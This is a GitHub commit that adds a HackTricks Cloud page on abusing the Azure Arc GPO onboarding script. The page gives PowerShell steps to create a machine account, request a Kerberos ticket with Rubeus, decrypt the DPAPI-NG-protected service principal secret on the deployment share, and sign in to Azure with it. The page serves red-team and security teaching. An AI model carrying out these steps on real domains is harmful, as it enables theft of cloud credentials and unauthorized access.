-
Notifications
You must be signed in to change notification settings - Fork 267
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #68 from xybytes/Azure-Arc-Vulnerable-GPO-Deploy-S…
…cript Create az-arc-vulnerable-gpo-deploy-script.md
- Loading branch information
Showing
1 changed file
with
95 additions
and
0 deletions.
There are no files selected for viewing
95 changes: 95 additions & 0 deletions
95
...curity/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,95 @@ | ||
| # Az - Azure Arc Vulnerable GPO Deploy Script | ||
|
|
||
| <details> | ||
|
|
||
| <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> | ||
|
|
||
| Other ways to support HackTricks: | ||
|
|
||
| - If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! | ||
| - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) | ||
| - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) | ||
| - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** | ||
| - **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
|
||
| </details> | ||
|
|
||
| ### Identifying the Issues | ||
|
|
||
| Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1. | ||
|
|
||
| When executed, the DeployGPO.ps1 script performs the following actions: | ||
|
|
||
| 1. Creates the Azure Arc Servers Onboarding GPO within the local domain. | ||
| 2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package. | ||
|
|
||
| When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script. | ||
|
|
||
| An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments. | ||
|
|
||
| ```powershell | ||
| # Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups | ||
| $DomainComputersSID = "SID=" + $DomainComputersSID | ||
| $DomainControllersSID = "SID=" + $DomainControllersSID | ||
| $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR " | ||
| Import-Module $PSScriptRoot\AzureArcDeployment.psm1 | ||
| $encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret) | ||
| ``` | ||
|
|
||
| ### Exploit | ||
|
|
||
| We have the follow conditions: | ||
|
|
||
| 1. We have successfully penetrated the internal network. | ||
| 2. We have the capability to create or assume control of a computer account within Active Directory. | ||
| 3. We have discovered a network share containing the AzureArcDeploy directory. | ||
|
|
||
| There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations. | ||
|
|
||
| ```powershell | ||
| Import-MKodule powermad | ||
| New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose | ||
| ``` | ||
|
|
||
| Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe. | ||
|
|
||
| ```powershell | ||
| runas /user:fake01$ /netonly powershell | ||
| ``` | ||
|
|
||
| ```powershell | ||
| .\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr | ||
| ``` | ||
|
|
||
| By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret. | ||
|
|
||
| ```powershell | ||
| Import-Module .\AzureArcDeployment.psm1 | ||
| $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedServicePrincipalSecret" | ||
| $ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret) | ||
| $ebs | ||
| ``` | ||
|
|
||
| Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG). | ||
|
|
||
| At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal. | ||
|
|
||
| ## References | ||
|
|
||
| - [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/) | ||
|
|
||
| <details> | ||
|
|
||
| <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> | ||
|
|
||
| Other ways to support HackTricks: | ||
|
|
||
| - If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! | ||
| - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) | ||
| - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) | ||
| - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** | ||
| - **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
|
||
| </details> |